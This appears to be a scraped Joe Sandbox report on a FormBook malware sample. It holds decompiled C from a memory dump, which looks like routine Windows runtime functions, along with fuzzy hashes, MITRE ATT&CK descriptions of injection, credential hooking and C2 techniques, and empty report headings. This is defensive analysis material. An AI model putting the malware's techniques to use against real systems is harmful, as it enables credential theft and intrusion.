Opcode Fuzzy Hash: 03eccf9ac8656b0a42788fe4894839c5c2e33c88f3d1301461639020decb00d7
Instruction Fuzzy Hash: C2F0B470E04608AFD714EFB8D441A6E77B4FF58300F10809AE906EB380EA34F900D764

Uniqueness

Uniqueness Score: -1.00%

Function 045D927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E045D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L045B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E045DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E045D92C6(_t11, _t14);
				}
				return _t11;
			}

0x045d9295
0x045d9299
0x045d929f
0x045d92aa
0x045d92ad
0x045d92ae
0x045d92af
0x045d92b0
0x045d92b4
0x045d92bb
0x045d92bb
0x045d92c5

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: b8d43c9cc10815fd94c98a78e4e2f8954f7b99a032eb51e13017b9a3c858d598
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 62E06D72240A416BE7219E5ADC84B5776A9AFC2725F044079B9045E282CAE6E90997E0

Uniqueness

Uniqueness Score: -1.00%

Function 045B746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E045B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E045AEB70(__ecx, 0x46879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E045D95D0();
							L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x045b746d
0x045b746d
0x045b746d
0x045b7471
0x045b7488
0x045ff92d
0x045b748e
0x045b7491
0x045b7495
0x045ff937
0x045ff93a
0x045ff94e
0x045ff953
0x045ff956
0x045ff956
0x045b7495
0x00000000
0x045b7488
0x045b7473
0x045b7478
0x045b747d
0x045b7481
0x00000000
0x045b7481
0x045b747d
0x045b747a
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4de603c9e22efa5fbe1f1cf9544e0f80b04da55101491add3d020cdae32782bc
Instruction ID: 1dfce42b222bd246701a11e153af714fe268e33c31034f8e080742327d0dd3c7
Opcode Fuzzy Hash: 4de603c9e22efa5fbe1f1cf9544e0f80b04da55101491add3d020cdae32782bc
Instruction Fuzzy Hash: FAF0B435B44145AADF119B68C940BF9BB71BF88316F040695D8D1AB550F764B801B7C5

Uniqueness

Uniqueness Score: -1.00%

Function 04668CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04668CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x468d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E045B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04668ce5
0x04668ced
0x04668cf0
0x04668cfb
0x04668d0d
0x04668cfd
0x04668d06
0x04668d06
0x04668d18
0x04668d19
0x04668d1b
0x04668d20
0x04668d33

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05923cd82928d588c8c0cfd0f6013d8d723f17e7ca3a642dbb4717d073c49804
Instruction ID: 0282a94184ad1c2df7208105657aad67a550477875a78340695108f3b61dbf82
Opcode Fuzzy Hash: 05923cd82928d588c8c0cfd0f6013d8d723f17e7ca3a642dbb4717d073c49804
Instruction Fuzzy Hash: C7F08270A05209AFDB04EBB8E945EAE77B4FF59304F10019AE916EB3C0EA34E900D764

Uniqueness

Uniqueness Score: -1.00%

Function 04668B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04668B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x468d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E045B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04668b67
0x04668b6f
0x04668b72
0x04668b7d
0x04668b8f
0x04668b7f
0x04668b88
0x04668b88
0x04668b9a
0x04668b9b
0x04668b9d
0x04668ba2
0x04668bb5

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6661957e8bd142bf189f520db181649bccc16fbfe3f6d1db68957006fa4d680
Instruction ID: 4bf020b5f74f822ceeef4368fd2ad1c66ca1d91cd59a12cadbaa9d39074e2cda
Opcode Fuzzy Hash: e6661957e8bd142bf189f520db181649bccc16fbfe3f6d1db68957006fa4d680
Instruction Fuzzy Hash: 9DF082B0A05259AFEB10EBB8D906E6E73B8FF44304F040459BA06DB3C0FA74E900D794

Uniqueness

Uniqueness Score: -1.00%

Function 04594F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04594F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E046688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E045BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4571030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04594f2e
0x04594f34
0x04594f38
0x045f0b85
0x045f0b85
0x045f0b89
0x045f0b9a
0x045f0b9a
0x045f0b9f
0x00000000
0x045f0b9f
0x045f0b94
0x045f0b98
0x00000000
0x00000000
0x00000000
0x045f0b98
0x04594f3e
0x04594f48
0x00000000
0x04594f6e
0x00000000
0x04594f70

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a0e11a37988fa764d42846f4d2bef578a4acc0054bcb5cb6de70994a11c022
Instruction ID: 291e70780ab6a82033b18c8f517f2d19d159b28b377fbb8b08f7904ec185221e
Opcode Fuzzy Hash: c0a0e11a37988fa764d42846f4d2bef578a4acc0054bcb5cb6de70994a11c022
Instruction Fuzzy Hash: 7EF0E9315396948FDB71DB14D940B17B7D4BB00BB8F084478D50587692C724FC41D641

Uniqueness

Uniqueness Score: -1.00%

Function 045CA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x46867e4 >= 0xa) {
					if(_t5 < 0x4686800 || _t5 >= 0x4686900) {
						return L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E045B0010(0x46867e0, _t5);
				}
			}

0x045ca190
0x045ca1a6
0x045ca1c2
0x00000000
0x00000000
0x00000000
0x045ca192
0x045ca192
0x045ca19f
0x045ca19f

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc32a11efe6e91cf63bd06508d8971eaf93b2dce088a2f2d00e14cfb3d8b2e9a
Instruction ID: 23b017976de936c1d31deb05bd9bc1a74c21dc22fd7e4d88059a88d5d9d48ead
Opcode Fuzzy Hash: bc32a11efe6e91cf63bd06508d8971eaf93b2dce088a2f2d00e14cfb3d8b2e9a
Instruction Fuzzy Hash: 82D0C7A11210082EFB2C2B90E814B623712F7C4B18F300A0CF1060A9A0EAA0FCD0A189

Uniqueness

Uniqueness Score: -1.00%

Function 045C16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E045C1710(0x46867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L045B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x045c16e8
0x045c16ef
0x045c16f3
0x045c16fe
0x00000000
0x045c1700
0x045c170d
0x045c170d
0x045c16f2
0x045c16f2
0x045c16f2
0x045c16f2

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f618d9fb04a67212c477e9b1d388e477f363c882b9dac2a042f3ad8ec76b75
Instruction ID: dbddbb36979abac28b836bc10e376c9e6e34539f494cf7573049a45929aafc5d
Opcode Fuzzy Hash: 79f618d9fb04a67212c477e9b1d388e477f363c882b9dac2a042f3ad8ec76b75
Instruction Fuzzy Hash: 51D0A7311405015AFA2D5F50A804B143251FBC0BC9F38005CF10B598C2CFB0FCD2F888

Uniqueness

Uniqueness Score: -1.00%

Function 045C35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045C35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E045AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x045c35a1
0x045c35a1
0x045c35a5
0x045c35ab
0x045c35ab
0x045c35b5
0x00000000
0x045c35c1
0x045c35b7

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 51f57b4bc53f0a90c5cee31fcffde7a6a7c5f071d95bb3a7cf14234a523a13a7
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: A9D0A93154218D9EEB01AB90D22876C33B2BB4230CF58A06D880206852C3BA6A1EF600

Uniqueness

Uniqueness Score: -1.00%

Function 0459AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0459AD30(intOrPtr _a4) {

				return L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0459ad49

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: fdba327e713c4675c2c84112dc09e11091e1994028e32e9401ccb044f6340aca
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 7DC08C32080688BBC7126A45CD00F017B29E7D4B60F000020BA040A6618932E861E588

Uniqueness

Uniqueness Score: -1.00%

Function 045C36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045C36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L045B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x045c36d2
0x045c36e8
0x045c36d4
0x045c36e5
0x045c36e5

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: d893f14511d1dca4490e5380dcb4e5748fb4609aec4b5429a34c5aba31efc864
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: FBC02B70150440FFE7251F70CD00F147254F740A21F6403587220494F0D528BC00F500

Uniqueness

Uniqueness Score: -1.00%

Function 045B7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x045b7d56
0x045b7d5b
0x045b7d60
0x045b7d5d
0x045b7d5d
0x045b7d5d

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: a6cd9916122fdc79a149ba05edcc09eb8b0df0bdf6b12e2080e6fd0f3f7b4021
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 72B092343019409FCF16DF18C080B5533E4BB88A80B8400D4E400CBA20D229E8009900

Uniqueness

Uniqueness Score: -1.00%

Function 0462FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0462FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E045DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04625720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04625720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0462fdda
0x0462fde2
0x0462fde5
0x0462fdec
0x0462fdfa
0x0462fdff
0x0462fe0a
0x0462fe0f
0x0462fe17
0x0462fe1e
0x0462fe19
0x0462fe19
0x0462fe19
0x0462fe20
0x0462fe21
0x0462fe22
0x0462fe25
0x0462fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0462FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0462FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0462FE2B

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 4884d1ed745216e2e9b2ef599821b87917c07c058c4b27654b994aa0e6b574be
Instruction ID: 3b38bee6a96998ed215f7f01a1ee3acf39db0ee8ffba59c54c3ce72b5a8ee6ca
Opcode Fuzzy Hash: 4884d1ed745216e2e9b2ef599821b87917c07c058c4b27654b994aa0e6b574be
Instruction Fuzzy Hash: 81F0F672240611BFE6352A45DD02F33BF6AEB84730F140318F668565D1EA62FC60EAF4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ox87DNNM8d.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

